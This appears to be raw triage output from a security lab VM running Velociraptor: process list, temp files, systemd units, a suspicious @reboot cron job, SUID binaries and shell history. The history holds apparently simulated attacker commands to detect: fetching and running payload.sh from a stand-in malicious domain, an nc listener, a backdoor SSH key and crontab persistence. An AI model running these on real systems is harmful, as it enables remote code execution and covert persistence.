champus+ 10754 0.0 1.0 2428568 65088 ? Sl 11:47 0:27 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {3a17b899-5005-4e4a-82f2-292b77770c09} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 16 tab
root 10934 0.0 0.0 0 0 ? I 11:50 0:04 [kworker/1:1-events]
root 23306 0.0 0.0 0 0 ? I 16:23 0:00 [kworker/u4:2]
root 24156 0.0 0.0 0 0 ? I 16:53 0:01 [kworker/0:1-events]
root 24945 0.0 0.0 0 0 ? I 18:38 0:00 [kworker/u5:1-events_power_efficient]
root 24992 0.0 0.0 0 0 ? I 18:45 0:00 [kworker/u6:3-events_unbound]
root 25287 0.0 0.0 0 0 ? I 19:35 0:00 [kworker/u6:1-flush-8:0]
root 25479 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/u6:2-events_unbound]
root 25485 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/u5:0-events_unbound]
champus+ 25558 0.3 1.0 3059024 65360 ? Sl 19:48 0:02 gjs /usr/share/gnome-shell/extensions/ding@rastersoft.com/ding.js -E -P /usr/share/gnome-shell/extensions/ding@rastersoft.com -M 0 -D 0:0:1280:800:1:27:0:0:0:0
champus+ 25620 0.0 0.3 35940 18688 ? S 19:49 0:00 /usr/bin/python3 /usr/bin/gnome-terminal --wait
champus+ 25621 0.0 0.4 307540 27136 ? Sl 19:49 0:00 /usr/bin/gnome-terminal.real --wait
champus+ 25624 0.6 0.7 890588 48360 ? Ssl 19:49 0:04 /usr/libexec/gnome-terminal-server
champus+ 25647 0.0 0.0 11268 5504 pts/0 Ss 19:49 0:00 bash
root 25715 0.0 0.0 0 0 ? I 19:50 0:00 [kworker/u5:2-flush-8:0]
root 25736 0.0 0.1 14348 6144 pts/0 S+ 19:51 0:00 sudo -i
root 25737 0.0 0.0 14348 2512 pts/1 Ss 19:51 0:00 sudo -i
root 25738 0.0 0.0 11396 5504 pts/1 S 19:51 0:00 -bash
root 25808 0.0 0.0 0 0 ? I 19:53 0:00 [kworker/1:0]
root 25833 0.0 0.0 0 0 ? I 19:55 0:00 [kworker/0:2-events]
root 25836 0.0 0.0 0 0 ? I 19:55 0:00 [kworker/u5:3-writeback]
root 25860 0.0 0.0 0 0 ? I< 19:59 0:00 [kworker/R-tls-s]
root 25906 0.0 0.0 0 0 ? I 20:01 0:00 [kworker/0:0-events]
champus+ 25992 2.8 0.5 398960 31332 ? SNsl 20:02 0:00 /usr/libexec/tracker-extract-3
root 25997 0.0 0.0 11396 3828 pts/1 S+ 20:02 0:00 -bash
root 26004 0.0 0.0 12672 3456 pts/1 R+ 20:02 0:00 ps aux
--------------------------------- List files:
total 68
drwxrwxrwt 17 root root 4096 Nov 6 19:48 .
drwxr-xr-x 20 root root 4096 Nov 6 20:01 ..
drwxrwxrwt 2 root root 4096 Nov 6 11:09 .font-unix
-rw------- 1 champuser champuser 0 Nov 6 11:09 gdm3-config-err-4Hw2lH
drwxrwxrwt 2 root root 4096 Nov 6 11:09 .ICE-unix
drwx------ 4 root root 4096 Nov 6 11:42 snap-private-tmp
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-colord.service-hijiiC
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-ModemManager.service-pubDje
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-power-profiles-daemon.service-Msg1Aw
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-switcheroo-control.service-vc6JUV
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-logind.service-mRItdE
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-oomd.service-ZSLhw3
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-resolved.service-qTOjod
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-timesyncd.service-d7gdD4
drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-upower.service-k0lchS
drwxrwxrwt 2 root root 4096 Nov 6 11:09 .Test-unix
drwxrwxrwt 2 root root 4096 Nov 6 11:09 .X11-unix
drwxrwxrwt 2 root root 4096 Nov 6 11:09 .XIM-unix
total 12
drwxr-xr-x 3 root root 4096 Nov 1 13:49 .
drwxr-xr-x 20 root root 4096 Nov 6 20:01 ..
drwx------ 16 root root 4096 Oct 4 16:23 velociraptor
--------------------------------- List Update.custom (the output that follows is a systemd unit listing)
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda1.device loaded active plugged QEMU_HARDDISK 1
sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda2.device loaded active plugged QEMU_HARDDISK EFI\x20System\x20Partition
sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda3.device loaded active plugged QEMU_HARDDISK 3
sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda.device loaded active plugged QEMU_HARDDISK
sys-devices-pci0000:00-0000:00:12.0-virtio1-net-ens18.device loaded active plugged Virtio network device
sys-devices-platform-serial8250-serial8250:0-serial8250:0.0-tty-ttyS0.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.0/tty/ttyS0
sys-devices-platform-serial8250-serial8250:0-serial8250:0.1-tty-ttyS1.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.1/tty/ttyS1
sys-devices-platform-serial8250-serial8250:0-serial8250:0.10-tty-ttyS10.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.10/tty/ttyS10
sys-devices-platform-serial8250-serial8250:0-serial8250:0.11-tty-ttyS11.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.11/tty/ttyS11
sys-devices-platform-serial8250-serial8250:0-serial8250:0.12-tty-ttyS12.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.12/tty/ttyS12
sys-devices-platform-serial8250-serial8250:0-serial8250:0.13-tty-ttyS13.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.13/tty/ttyS13
sys-devices-platform-serial8250-serial8250:0-serial8250:0.14-tty-ttyS14.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.14/tty/ttyS14
sys-devices-platform-serial8250-serial8250:0-serial8250:0.15-tty-ttyS15.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.15/tty/ttyS15
sys-devices-platform-serial8250-serial8250:0-serial8250:0.16-tty-ttyS16.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.16/tty/ttyS16
sys-devices-platform-serial8250-serial8250:0-serial8250:0.17-tty-ttyS17.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.17/tty/ttyS17
sys-devices-platform-serial8250-serial8250:0-serial8250:0.18-tty-ttyS18.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.18/tty/ttyS18
sys-devices-platform-serial8250-serial8250:0-serial8250:0.19-tty-ttyS19.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.19/tty/ttyS19
sys-devices-platform-serial8250-serial8250:0-serial8250:0.2-tty-ttyS2.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.2/tty/ttyS2
sys-devices-platform-serial8250-serial8250:0-serial8250:0.20-tty-ttyS20.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.20/tty/ttyS20
sys-devices-platform-serial8250-serial8250:0-serial8250:0.21-tty-ttyS21.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.21/tty/ttyS21
sys-devices-platform-serial8250-serial8250:0-serial8250:0.22-tty-ttyS22.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.22/tty/ttyS22
sys-devices-platform-serial8250-serial8250:0-serial8250:0.23-tty-ttyS23.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.23/tty/ttyS23
sys-devices-platform-serial8250-serial8250:0-serial8250:0.24-tty-ttyS24.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.24/tty/ttyS24
sys-devices-platform-serial8250-serial8250:0-serial8250:0.25-tty-ttyS25.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.25/tty/ttyS25
sys-devices-platform-serial8250-serial8250:0-serial8250:0.26-tty-ttyS26.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.26/tty/ttyS26
sys-devices-platform-serial8250-serial8250:0-serial8250:0.27-tty-ttyS27.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.27/tty/ttyS27
sys-devices-platform-serial8250-serial8250:0-serial8250:0.28-tty-ttyS28.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.28/tty/ttyS28
sys-devices-platform-serial8250-serial8250:0-serial8250:0.29-tty-ttyS29.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.29/tty/ttyS29
sys-devices-platform-serial8250-serial8250:0-serial8250:0.3-tty-ttyS3.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.3/tty/ttyS3
sys-devices-platform-serial8250-serial8250:0-serial8250:0.30-tty-ttyS30.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.30/tty/ttyS30
sys-devices-platform-serial8250-serial8250:0-serial8250:0.31-tty-ttyS31.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.31/tty/ttyS31
sys-devices-platform-serial8250-serial8250:0-serial8250:0.4-tty-ttyS4.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.4/tty/ttyS4
sys-devices-platform-serial8250-serial8250:0-serial8250:0.5-tty-ttyS5.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.5/tty/ttyS5
sys-devices-platform-serial8250-serial8250:0-serial8250:0.6-tty-ttyS6.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.6/tty/ttyS6
sys-devices-platform-serial8250-serial8250:0-serial8250:0.7-tty-ttyS7.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.7/tty/ttyS7
sys-devices-platform-serial8250-serial8250:0-serial8250:0.8-tty-ttyS8.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.8/tty/ttyS8
sys-devices-platform-serial8250-serial8250:0-serial8250:0.9-tty-ttyS9.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.9/tty/ttyS9
sys-devices-virtual-block-loop0.device loaded active plugged /sys/devices/virtual/block/loop0
sys-devices-virtual-block-loop1.device loaded active plugged /sys/devices/virtual/block/loop1
sys-devices-virtual-block-loop10.device loaded active plugged /sys/devices/virtual/block/loop10
sys-devices-virtual-block-loop11.device loaded active plugged /sys/devices/virtual/block/loop11
sys-devices-virtual-block-loop12.device loaded active plugged /sys/devices/virtual/block/loop12
sys-devices-virtual-block-loop13.device loaded active plugged /sys/devices/virtual/block/loop13
sys-devices-virtual-block-loop2.device loaded active plugged /sys/devices/virtual/block/loop2
sys-devices-virtual-block-loop3.device loaded active plugged /sys/devices/virtual/block/loop3
sys-devices-virtual-block-loop4.device loaded active plugged /sys/devices/virtual/block/loop4
sys-devices-virtual-block-loop5.device loaded active plugged /sys/devices/virtual/block/loop5
sys-devices-virtual-block-loop6.device loaded active plugged /sys/devices/virtual/block/loop6
sys-devices-virtual-block-loop7.device loaded active plugged /sys/devices/virtual/block/loop7
sys-devices-virtual-block-loop8.device loaded active plugged /sys/devices/virtual/block/loop8
sys-devices-virtual-block-loop9.device loaded active plugged /sys/devices/virtual/block/loop9
sys-devices-virtual-misc-rfkill.device loaded active plugged /sys/devices/virtual/misc/rfkill
sys-devices-virtual-tty-ttyprintk.device loaded active plugged /sys/devices/virtual/tty/ttyprintk
sys-module-configfs.device loaded active plugged /sys/module/configfs
sys-module-fuse.device loaded active plugged /sys/module/fuse
sys-subsystem-net-devices-ens18.device loaded active plugged Virtio network device
-.mount loaded active mounted Root Mount
boot-efi.mount loaded active mounted /boot/efi
dev-hugepages.mount loaded active mounted Huge Pages File System
dev-mqueue.mount loaded active mounted POSIX Message Queue File System
proc-sys-fs-binfmt_misc.mount loaded active mounted Arbitrary Executable File Formats File System
run-credentials-systemd\x2dsysusers.service.mount loaded active mounted /run/credentials/systemd-sysusers.service
run-snapd-ns-firefox.mnt.mount loaded active mounted /run/snapd/ns/firefox.mnt
run-snapd-ns-snapd\x2ddesktop\x2dintegration.mnt.mount loaded active mounted /run/snapd/ns/snapd-desktop-integration.mnt
run-snapd-ns.mount loaded active mounted /run/snapd/ns
run-user-1000-doc.mount loaded active mounted /run/user/1000/doc
run-user-1000-gvfs.mount loaded active mounted /run/user/1000/gvfs
run-user-1000.mount loaded active mounted /run/user/1000
snap-bare-5.mount loaded active mounted Mount unit for bare, revision 5
snap-core22-2133.mount loaded active mounted Mount unit for core22, revision 2133
snap-core22-2139.mount loaded active mounted Mount unit for core22, revision 2139
snap-firefox-7084.mount loaded active mounted Mount unit for firefox, revision 7084
snap-firefox-7177.mount loaded active mounted Mount unit for firefox, revision 7177
snap-gnome\x2d42\x2d2204-202.mount loaded active mounted Mount unit for gnome-42-2204, revision 202
snap-gnome\x2d42\x2d2204-226.mount loaded active mounted Mount unit for gnome-42-2204, revision 226
snap-gtk\x2dcommon\x2dthemes-1535.mount loaded active mounted Mount unit for gtk-common-themes, revision 1535
snap-snap\x2dstore-1113.mount loaded active mounted Mount unit for snap-store, revision 1113
snap-snap\x2dstore-1216.mount loaded active mounted Mount unit for snap-store, revision 1216
snap-snapd-25202.mount loaded active mounted Mount unit for snapd, revision 25202
snap-snapd-25577.mount loaded active mounted Mount unit for snapd, revision 25577
snap-snapd\x2ddesktop\x2dintegration-178.mount loaded active mounted Mount unit for snapd-desktop-integration, revision 178
snap-snapd\x2ddesktop\x2dintegration-315.mount loaded active mounted Mount unit for snapd-desktop-integration, revision 315
sys-fs-fuse-connections.mount loaded active mounted FUSE Control File System
sys-kernel-config.mount loaded active mounted Kernel Configuration File System
sys-kernel-debug-tracing.mount loaded active mounted /sys/kernel/debug/tracing
sys-kernel-debug.mount loaded active mounted Kernel Debug File System
sys-kernel-tracing.mount loaded active mounted Kernel Trace File System
acpid.path loaded active running ACPI Events Check
cups.path loaded active running CUPS Scheduler
systemd-ask-password-plymouth.path loaded active waiting Forward Password Requests to Plymouth Directory Watch
systemd-ask-password-wall.path loaded active waiting Forward Password Requests to Wall Directory Watch
whoopsie.path loaded active waiting Start whoopsie on modification of the /var/crash directory
init.scope loaded active running System and Service Manager
session-2.scope loaded active running Session 2 of User champuser
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active running ACPI event daemon
apparmor.service loaded active exited Load AppArmor profiles
apport.service loaded active exited LSB: automatic crash report generation
auditd.service loaded active running Security Auditing Service
avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack
colord.service loaded active running Manage, Install and Generate Color Profiles
console-setup.service loaded active exited Set console font and keymap
cron.service loaded active running Regular background program processing daemon
cups-browsed.service loaded active running Make remote CUPS printers available locally
cups.service loaded active running CUPS Scheduler
dbus.service loaded active running D-Bus System Message Bus
gdm.service loaded active running GNOME Display Manager
irqbalance.service loaded active running irqbalance daemon
kerneloops.service loaded active running Tool to automatically collect and submit kernel crash signatures
keyboard-setup.service loaded active exited Set the console keyboard layout
kmod-static-nodes.service loaded active exited Create List of Static Device Nodes
ModemManager.service loaded active running Modem Manager
networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd
NetworkManager-wait-online.service loaded active exited Network Manager Wait Online
NetworkManager.service loaded active running Network Manager
openvpn.service loaded active exited OpenVPN service
packagekit.service loaded active running PackageKit Daemon
plymouth-quit-wait.service loaded active exited Hold until boot process finishes up
plymouth-read-write.service loaded active exited Tell Plymouth To Write Out Runtime Data
plymouth-start.service loaded active exited Show Plymouth Boot Screen
podman-restart.service loaded active exited Podman Start All Containers With Restart Policy Set To Always
polkit.service loaded active running Authorization Manager
power-profiles-daemon.service loaded active running Power Profiles daemon
rsyslog.service loaded active running System Logging Service
rtkit-daemon.service loaded active running RealtimeKit Scheduling Policy Service
setvtrgb.service loaded active exited Set console scheme
snapd.apparmor.service loaded active exited Load AppArmor profiles managed internally by snapd
snapd.seeded.service loaded active exited Wait until snapd is fully seeded
snapd.service loaded active running Snap Daemon
switcheroo-control.service loaded active running Switcheroo Control Proxy service
systemd-binfmt.service loaded active exited Set Up Additional Binary Formats
systemd-fsck@dev-disk-by\x2duuid-4015\x2d7165.service loaded active exited File System Check on /dev/disk/by-uuid/4015-7165
systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running User Login Management
systemd-modules-load.service loaded active exited Load Kernel Modules
systemd-oomd.service loaded active running Userspace Out-Of-Memory (OOM) Killer
systemd-random-seed.service loaded active exited Load/Save Random Seed
systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems
systemd-resolved.service loaded active running Network Name Resolution
systemd-sysctl.service loaded active exited Apply Kernel Variables
systemd-sysusers.service loaded active exited Create System Users
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev
systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories
systemd-udev-trigger.service loaded active exited Coldplug All udev Devices
systemd-udevd.service loaded active running Rule-based Manager for Device Events and Files
systemd-update-utmp.service loaded active exited Record System Boot/Shutdown in UTMP
systemd-user-sessions.service loaded active exited Permit User Sessions
udisks2.service loaded active running Disk Manager
ufw.service loaded active exited Uncomplicated firewall
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
upower.service loaded active running Daemon for power management
user-runtime-dir@1000.service loaded active exited User Runtime Directory /run/user/1000
user@1000.service loaded active running User Manager for UID 1000
velociraptor.service loaded active running Velociraprot linux amd64
wpa_supplicant.service loaded active running WPA supplicant
-.slice loaded active active Root Slice
system-getty.slice loaded active active Slice /system/getty
system-modprobe.slice loaded active active Slice /system/modprobe
system-systemd\x2dfsck.slice loaded active active Slice /system/systemd-fsck
system.slice loaded active active System Slice
user-1000.slice loaded active active User Slice of UID 1000
user.slice loaded active active User and Session Slice
acpid.socket loaded active running ACPID Listen Socket
avahi-daemon.socket loaded active running Avahi mDNS/DNS-SD Stack Activation Socket
cups.socket loaded active running CUPS Scheduler
dbus.socket loaded active running D-Bus System Message Bus Socket
podman.socket loaded active listening Podman API Socket
snapd.socket loaded active running Socket activation for snappy daemon
syslog.socket loaded active running Syslog Socket
systemd-fsckd.socket loaded active listening fsck to fsckd communication Socket
systemd-initctl.socket loaded active listening initctl Compatibility Named Pipe
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-rfkill.socket loaded active listening Load/Save RF Kill Switch Status /dev/rfkill Watch
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
uuidd.socket loaded active listening UUID daemon activation socket
swapfile.swap loaded active active /swapfile
basic.target loaded active active Basic System
cryptsetup.target loaded active active Local Encrypted Volumes
getty-pre.target loaded active active Preparation for Logins
getty.target loaded active active Login Prompts
graphical.target loaded active active Graphical Interface
local-fs-pre.target loaded active active Preparation for Local File Systems
local-fs.target loaded active active Local File Systems
multi-user.target loaded active active Multi-User System
network-online.target loaded active active Network is Online
network-pre.target loaded active active Preparation for Network
network.target loaded active active Network
nss-lookup.target loaded active active Host and Network Name Lookups
nss-user-lookup.target loaded active active User and Group Name Lookups
paths.target loaded active active Path Units
remote-fs.target loaded active active Remote File Systems
slices.target loaded active active Slice Units
snapd.mounts-pre.target loaded active active Mounting snaps
snapd.mounts.target loaded active active Mounted snaps
sockets.target loaded active active Socket Units
swap.target loaded active active Swaps
sysinit.target loaded active active System Initialization
time-set.target loaded active active System Time Set
timers.target loaded active active Timer Units
veritysetup.target loaded active active Local Verity Protected Volumes
anacron.timer loaded active waiting Trigger anacron every hour
apt-daily-upgrade.timer loaded active waiting Daily apt upgrade and clean activities
apt-daily.timer loaded active waiting Daily apt download activities
dpkg-db-backup.timer loaded active waiting Daily dpkg database backup timer
e2scrub_all.timer loaded active waiting Periodic ext4 Online Metadata Check for All Filesystems
fstrim.timer loaded active waiting Discard unused blocks once a week
fwupd-refresh.timer loaded active waiting Refresh fwupd metadata regularly
logrotate.timer loaded active waiting Daily rotation of log files
man-db.timer loaded active waiting Daily man-db regeneration
motd-news.timer loaded active waiting Message of the Day
podman-auto-update.timer loaded active waiting Podman auto-update timer
systemd-tmpfiles-clean.timer loaded active waiting Daily Cleanup of Temporary Directories
update-notifier-download.timer loaded active waiting Download data for packages that failed at package install time
update-notifier-motd.timer loaded active waiting Check to see whether there is a new version of Ubuntu available
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
220 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
--------------------------------- CronJob
@reboot /var/tmp/SecurityUpdate/svchost
--------------------------------- suid
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/gpasswd
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/chfn
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/mount
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/newgrp
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/chsh
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/passwd
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/umount
/home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/su
/snap/core22/2133/usr/bin/chfn
/snap/core22/2133/usr/bin/chsh
/snap/core22/2133/usr/bin/gpasswd
/snap/core22/2133/usr/bin/mount
/snap/core22/2133/usr/bin/newgrp
/snap/core22/2133/usr/bin/passwd
/snap/core22/2133/usr/bin/su
/snap/core22/2133/usr/bin/sudo
/snap/core22/2133/usr/bin/umount
/snap/core22/2133/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/2133/usr/lib/openssh/ssh-keysign
/snap/core22/2133/usr/libexec/polkit-agent-helper-1
/snap/core22/2139/usr/bin/chfn
/snap/core22/2139/usr/bin/chsh
/snap/core22/2139/usr/bin/gpasswd
/snap/core22/2139/usr/bin/mount
/snap/core22/2139/usr/bin/newgrp
/snap/core22/2139/usr/bin/passwd
/snap/core22/2139/usr/bin/su
/snap/core22/2139/usr/bin/sudo
/snap/core22/2139/usr/bin/umount
/snap/core22/2139/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/2139/usr/lib/openssh/ssh-keysign
/snap/core22/2139/usr/libexec/polkit-agent-helper-1
/usr/bin/fusermount3
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/mount
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/umount
/usr/bin/sudo
/usr/bin/su
/usr/libexec/polkit-agent-helper-1
/usr/sbin/pppd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/xorg/Xorg.wrap
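--------------------------------- Malicious Commands (appears to be unfiltered shell history; routine admin commands are included alongside the suspicious ones)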
chmod +x /usr/local/bin/velociraptor
velociraptor config generate -i
nano /root/server.config.yaml
nano /lib/systemd/system/velociraptor.service
systemctl daemon-reload
systemctl enable --now velociraptor
systemctl status velociraptor
systemctl restart velociraptor.service
nano /root/server.config.yaml
systemctl restart velociraptor.service
cls
clear
the key should be located in HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated however. The "Installer" section is non existent meaning the key doesnt exist
for whatever reason I was only able to locate 17 registry keys using the hunt function. Lets move to windows now
ls
pwd
cat server.config.yaml
wget http://malicious-domain.com/payload.sh
chmod +x payload.sh
./payload.sh
nc -lvp 4444
ssh-keygen -t rsa -b 4096 -f /root/.ssh/backdoor_key -N ""
echo "* * * * * /tmp/persistence.sh" | crontab -
cd .ssh
cd /.ssh
wget http://malicious-domain.com/payload.sh
chmod +x payload.sh
./payload.sh
nc -lvp 4444
ssh-keygen -t rsa -b 4096 -f /root/.ssh/backdoor_key -N ""
echo "* * * * * /tmp/persistence.sh" | crontab -
apt install net-tools
cls
cleart
clear
install auditd
apt install auditd
clear
wget https://raw.githubusercontent.com/Neo23x0/auditd/refs/heads/master/auditrules -O /etc/audit/rules.d/audit.rules
clear
wget https://raw.githubusercontent.com/Neo23x0/auditd/refs/heads/master/audit.rules -O /etc/audit/rules.d/audit.rules
clear
systemctl restart audit.d
cleart
clear
systemctl restart auditd
systemctl status auditd
clear
tail /var/log/audit/auditlog
clear
tail /var/log/audit/audit.log
clear
wget https://research.cyfidant.com
clear
cat /var/log/audit/audit.log | grep wget
clear
grep wget /var/log/audit/audit.loc
grep wget /var/log/audit/audit.log
grep https://research.cyfidant.com /var/log/audit/audit.log
|